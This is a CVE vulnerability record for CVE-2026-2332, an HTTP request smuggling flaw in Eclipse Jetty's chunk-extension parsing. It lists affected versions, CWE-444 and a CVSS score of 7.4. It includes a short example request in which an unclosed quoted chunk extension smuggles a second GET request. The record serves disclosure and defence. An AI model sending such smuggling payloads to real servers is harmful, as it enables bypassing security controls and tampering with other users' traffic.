CVE-2026-2332
Description
In Eclipse Jetty, the HTTP/1.1 parser is vulnerable to request smuggling when chunk extensions are used, similar to the "funky chunks" techniques outlined here:
* https://w4ke.info/2025/06/18/funky-chunks.html
* https://w4ke.info/2025/10/29/funky-chunks-2.html
Jetty terminates chunk extension parsing at \r\n inside quoted strings instead of treating this as an error.
POST / HTTP/1.1
Host: localhost
Transfer-Encoding: chunked
1;ext="val
X
0
GET /smuggled HTTP/1.1
...
Note how the chunk extension does not close the double quotes, and it is able to inject a smuggled request.
CWE
- CWE-444 — CWE-444 Inconsistent interpretation of HTTP requests ('HTTP Request/Response smuggling')
Affected
- Eclipse Foundation / Eclipse Jetty — v=12.1.0 ≤12.1.6 [affected]; v=12.0.0 ≤12.0.32 [affected]; v=11.0.0 ≤11.0.27 [affected]; v=10.0.0 ≤10.0.27 [affected]; v=9.4.0 ≤9.4.59 [affected]
CVSS
- 3.1 score=7.4 severity=HIGH
CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:N
References
- https://github.com/jetty/jetty.project/security/advisories/GHSA-355h-qmc2-wpwf third-party-advisory
- https://gitlab.eclipse.org/security/cve-assignment/-/issues/89 issue-tracking
Source
cvelistV5-main/cves/2026/2xxx/CVE-2026-2332.json